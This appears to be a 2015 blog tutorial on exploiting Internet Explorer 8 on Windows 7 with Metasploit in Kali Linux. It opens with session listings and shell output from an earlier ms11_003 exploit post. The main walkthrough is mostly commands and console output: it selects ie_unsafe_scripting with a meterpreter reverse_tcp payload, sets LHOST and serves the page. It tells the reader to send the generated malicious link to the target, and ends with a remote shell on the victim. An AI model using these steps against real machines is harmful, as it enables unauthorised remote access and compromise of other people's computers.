  1   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49219 (192.168.122.10)
  2   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49221 (192.168.122.10)
  3   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49224 (192.168.122.10)
  4   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49226 (192.168.122.10)


10) Connect to the remote machine.
msf exploit(ms11_003_ie_css_import) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : SHABBIR-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

meterpreter > getuid
Server username: shabbir-PC\ali

meterpreter > shell
Process 2704 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ali\Desktop>

Saturday 20 June 2015

Hack Internet Explorer 8 in Windows 7 using Kali Linux


In this tutorial, we will hack Internet Explorer 8 in Windows 7 Service Pack 1 (unpatched) using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.

This exploit works when the Initialize and script ActiveX controls not marked as safe setting is enabled in Internet Explorer.

To enable the above setting, start Internet Explorer and click on Tools -> Internet Options -> Security -> Custom Level -> Initialize and script ActiveX controls not marked as safe -> Enable.

We have the  following configuration:
Windows 7 IP Address: 192.168.122.10
Kali Linux IP Address: 192.168.122.115

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >

3) Select exploit.
msf > use exploit/windows/browser/ie_unsafe_scripting

4) Select payload. 
msf exploit(ie_unsafe_scripting) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

5) View options.
msf exploit(ie_unsafe_scripting) > show options

Module options (exploit/windows/browser/ie_unsafe_scripting):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TECHNIQUE  VBS              yes       Delivery technique (VBS Exe Drop or PSH CMD) (accepted: VBS, Powershell)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86/x64

6) Set options
msf exploit(ie_unsafe_scripting) > set LHOST 192.168.122.115
LHOST => 192.168.122.115

7) Execute the exploit.
msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ie_unsafe_scripting) > [*] Using URL: http://0.0.0.0:8080/bHN7e4
[*]  Local IP: http://192.168.122.115:8080/bHN7e4
[*] Server started.


8) User clicks on the malicious URL. As we can see, a link has been generated as a result of the exploit command. This is the malicious link (http://192.168.122.115:8080/bHN7e4) that we will have to send to our target, so that it can exploit their browser.

When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. But you will get a remote shell on your msfconsole, as shown below.

msf exploit(ie_unsafe_scripting) > [*] 192.168.122.10   ie_unsafe_scripting - Request received for /bHN7e4
[*] 192.168.122.10   ie_unsafe_scripting - Sending exploit html/javascript
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Meterpreter session 1 opened (192.168.122.115:4444 -> 192.168.122.10:49166) at 2015-06-20 17:13:43 +0530

msf exploit(ie_unsafe_scripting) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\shabbir\Desktop>